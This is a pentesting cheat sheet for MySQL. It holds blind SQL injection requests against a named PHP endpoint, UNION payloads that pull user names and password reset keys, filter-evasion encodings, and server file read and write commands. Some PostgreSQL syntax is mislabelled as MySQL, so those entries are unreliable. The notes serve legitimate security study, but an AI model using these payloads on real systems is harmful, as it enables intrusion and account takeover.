MySQL – 3306 – TCP

Database Pentest
by TechnoHerder : Leave a comment

Common Commands

mysql -u userName -p

show databases;
use databaseName;
show tables;

mysql> select user();
SELECT current_setting('is_superuser');

mysql> SHOW GRANTS;
SHOW GRANTS;
SHOW GRANTS FOR CURRENT_USER;
SHOW GRANTS FOR CURRENT_USER();

### clear screen ###
mysql > system clear;

SELECT User, Update_priv FROM mysql.user;
SELECT User, Host, Password FROM mysql.user;

select privilege_type from information_schema.user_privileges where grantee = "'root'@'localhost'";
Can also see if they can Is_Grantable to others

select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/((char_length((select/**/version()))))=§15§%23

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/user()),15,1)))=§53§%23 

GET /class/mods/_standard/social/index_public.php?q=test%27)/**/or/**/(ascii(substring((select/**/privilege_type/**/from/**/information_schema.user_privileges/**/where/**/grantee/**/=/**/"'root'@'localhost'"/**/order/**/by/**/privilege_type/**/limit/**/1),1,1)))=§53§%23

Interesting Files

### check for secrets/settings ###
sudo nano /etc/mysql/my.cnf

### set logging on for easier hacking in that my.cnf file ###
general_log_file = /var/logmysql/mysql.log ### or whereever
general_log      = 1

### restart mysql now ###
sudo systemctl restart mysql

### use the tail command to inspect the MySQL log file ###
### see all queries being executed as they happen ### 
### see new lines as they come with the -f option ###
tail -f /var/log/mysql/mysql.log

### environment key/value pairs
$ cat .env
MYSQL_DATABASE=databaseName
MYSQL_USER=dataUser
MYSQL_PASSWORD=userPassword
MYSQL_ROOT_PASSWORD=rootPassword
MYSQL_HOST=localhost
DOMAIN=test.tld
DEBUG=false

Encoding

### ASCII Encoding
### Blind Attack Example ###
### sometimes special characters fuck things up ###
### so convert to ascii ### 
select/**/ascii(substring((select/**/version()),1,1))=52;
### ascii 52 is equal to 5 ###
### Server version: 5.5.47-0+deb8u1-log (Debian) ###


### Hex or base64 encodings
select convert_from(decode('aGF4b3I=', 'base64'), 'utf-8');
	this gives ‘haxor’
	

MariaDB [mysql]> select concat(0x31333337,0x206840783072)
    -> ;
+-----------------------------------+
| concat(0x31333337,0x206840783072) |
+-----------------------------------+
| 1337 h@x0r                        |
+-----------------------------------+
1 row in set (0.00 sec)


SELECT CHAR(65 using ASCII)  ==> returrns "A"
SELECt CHAR(66,65,68 using ASCII) ==> returns "BAD"


### MariaDB
SELECT CHR(67);
+---------+
| CHR(67) |
+---------+
| C       |
+---------+

SELECT CHR('67');
+-----------+
| CHR('67') |
+-----------+
| C         |
+-----------+



### Use comments for spaces /**/
select/**/'w00t';

Create, Read, or Update Files

\\ create table
CREATE temp table awae (content text);
\\ copy data to table from another file
COPY awae from $$c:\awae.txt$$;
\\ read the file's contents
SELECT content from awae;
DROP table awae;

\\ write to a file on the server
COPY (SELECT $$offsec$$) to $$c:\\offsec.txt$$;

\\ save query results to file
SELECT id_order,lastname,firstname,productName,productPrice
FROM _commandes
WHERE id_order=13
INTO OUTFILE 'C:/Documents and Settings/Stagiaire/Mes documents/Document/bonDeCommandes/No13.txt'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n'

SQL Injection Payloads

Basic

_scope" UNION ALL SELECT 1,2,3,4,5#

Version

_scope" UNION ALL SELECT 1,2,3,4,@@version#

Name from __Auth

_scope" UNION ALL SELECT 1,2,3,4,name FROM __Auth#

Collation

_scope" UNION ALL SELECT 1,2,3,4,COLLATION_NAME FROM information_schema.columns WHERE TABLE_NAME = "__global_search" AND COLUMN_NAME = "name"#

Name

_scope" UNION ALL SELECT 1,2,3,4,name COLLATE utf8mb4_general_ci FROM __Auth#

Column Names

_scope" UNION ALL SELECT 1,2,3,4,COLUMN_NAME FROM information_schema.columns WHERE TABLE_NAME = "tabUser"#

Name and Reset Token

_scope" UNION ALL SELECT name COLLATE utf8mb4_general_ci,2,3,4,reset_password_key COLLATE utf8mb4_general_ci FROM tabUser#

Code Review

Searching sucks in JD-GUI, so save the decompiled code for Notepad++. In JD-GUI, File > Save All Sources menu. Then open Notepad++ and use the ‘Find in Files’ or CRTL+Shift+F. Search for good ‘ol SELECT. We can improve our search using a regular expression; make sure the ‘Regular Expression’ radio button is selected.

^.?query.?select.*?

This searches for any line that has ‘query’ in it followed by ‘select’. An improved search regular expression

^.?query.?select.?where.?=.?".?\+.*?

The plus is a special character so need to add an escape in front of it.

**always** need escaping
\-\.\/\[\]\\ 

need escaping when **not** in a character class- [a-z*+{}()?]
\*\+\?\)\{\}\|

Leave a Reply

Your email address will not be published. Required fields are marked *